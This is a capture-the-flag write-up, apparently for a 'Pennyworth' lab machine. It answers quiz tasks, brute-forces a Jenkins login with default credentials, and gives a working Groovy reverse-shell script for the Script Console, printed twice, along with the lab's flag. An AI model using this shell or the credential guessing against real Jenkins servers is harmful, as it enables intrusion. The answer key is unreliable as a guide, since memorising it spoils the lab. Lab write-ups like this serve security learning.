Pennyworth

Task 1: What does the acronym CVE stand for?

Common Vulnerabilities and Exposures

Task 2: What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

Confidentiality, Integrity, Availability

Task 3: What is the version of the service running on port 8080?

Run the following nmap command:

nmap -sV -p 8080 [Target IP]

The answer is Jetty 9.4.39.v20210325

Task 4: What version of Jenkins is running on the target?

Start by going to your web browser and typing in http://[Target IP]:8080
At the login page, the source code does not tell us anything usefule
Try some default passwords. Nothing usual works.
Run the request through Intruder in Burpsuite to guess username and password
This shows that root:password is a login
On the admin page in the bottom right hand corner is version of Jenkins 2.289.1

Task 5: What type of script is accepted as input on the Jenkins Script Console?

On the first admin page, it states Groovy Script

Task 6: What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

I believe they are asking what the cli is for windows:
cmd.exe

Task 7: What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

In linux, a similar command would be:
ifconfig

Task 8: What switch should we use with netcat for it to use UDP transport mode?

Quick help search on netcat shows:
- The answer is -u

Task 9: What is the term used to describe making a target host initiate a connection back to the attacker host?

I just know this as "reverse shell"

Capture the Flag:

Browse for vulnerabilities in Jenkins.
- Discovered https://github.com/gquere/pwn_jenkins
  - Multiple ways to bypass login but at the end is a script you can plugin to the "Script Console" in the "Manage Jenkins" Tab on the right.
    http://[Target IP]:8080/script
- Start up a netcat listener on the host machine:

nc -lvnp 4444

in the "Script Console" plugin the following command from the github link below to make a reverse shell connection back to the host machine.

String host="HOST_IP";
int port=4444;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

The flag is located in /root/flag.txt
The flag is "9cdfb439c7876e703e307864c9167a15"

PreviousFunnel NextTactics

Last updated 1 year ago

String host="HOST_IP"; int port=4444; String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();